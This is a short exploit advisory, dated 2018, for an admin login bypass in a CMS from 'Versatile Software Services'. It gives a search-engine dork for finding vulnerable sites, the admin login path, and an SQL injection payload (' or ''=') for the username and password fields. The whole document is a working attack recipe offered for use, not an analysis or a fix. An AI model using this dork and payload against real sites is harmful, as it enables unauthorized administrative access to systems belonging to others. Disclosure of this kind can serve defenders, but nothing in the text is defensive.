# Exploit title: Admin Login Bypass in " Versatile Software Services " CMS
#
# Dork: “ inurl:/alogin.aspx intext: Powered By :- Versatile Software Services ”
#
# Date: 3-23-2018
#
# Exploit Author: Mehdi Razmjoo ( razmjumehdi@gmail.com )
#
# Vendor Homepage: http://www.vsspl.co.in
#
# Category: Web Application
#
# Tested On: Safari - Firefox
#
# =============================
#
# Description:
#
# First of all attacker find admin login page like:
# " http://Server/alogin.aspx "
# after that bypass admin Username & Password through this command:
#
# Admin ID: ' or ''='
# Password: ' or ''='
#
# Then attacker " Login " in this page.
#